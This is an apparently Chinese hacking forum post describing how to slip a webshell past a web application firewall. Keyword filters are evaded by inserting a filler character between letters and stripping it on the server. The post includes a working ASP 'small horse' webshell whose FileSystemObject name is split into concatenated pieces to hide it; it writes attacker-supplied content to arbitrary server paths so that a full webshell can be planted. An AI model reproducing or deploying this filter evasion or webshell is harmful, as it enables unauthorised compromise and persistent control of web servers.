破一流攔阻上傳大馬的手段 -電腦資料

    我們提交select會被攔截（如無特別指出，都為post），但是我們提交 s魚e魚l魚e魚c魚t 那就不會被攔截了

    也就是我們在提交時，將文本內(nèi)容進(jìn)行加密，提交到服務(wù)器后，在進(jìn)行重新解密，這樣就能繞過一流攔截系統(tǒng)了

    一下是一個自己測試用的小馬

    這個小馬的缺點：由于加密時是把整個文本進(jìn)行加密的，所以上傳的文本大小為原來的3倍，本地測試時傳大馬，卡半天

    不過這個可以增加關(guān)鍵字來解決，處理文本時把select等關(guān)鍵字進(jìn)行加密就行了

    一點小思路，拋磚引玉 by 3x

   

    <%

    on error resume next

    if request("path")<>"" then

    temp="scrip"&"ting.f"&"ilesyst"&"emobject"

    set fso=server.createobject(temp)

    response.write request.Form&""

    path=request("path")

    dama=replace(request("content"),"魚","")

    dama=replace(dama,"’","'")

    dama=replace(dama,"‘","'")

    set f=fso.createtextfile(path,true)

    f.write dama

    if err=0 then

    response.write "成功"

    else

    response.write "失敗"

    err.clear

    end if

    set f=nothing

    set fso=nothing

    end if

    %>

    當(dāng)前路徑 <%=server.mappath(request.servervariables("script_name"))%>

    保存路徑   

    </p><p>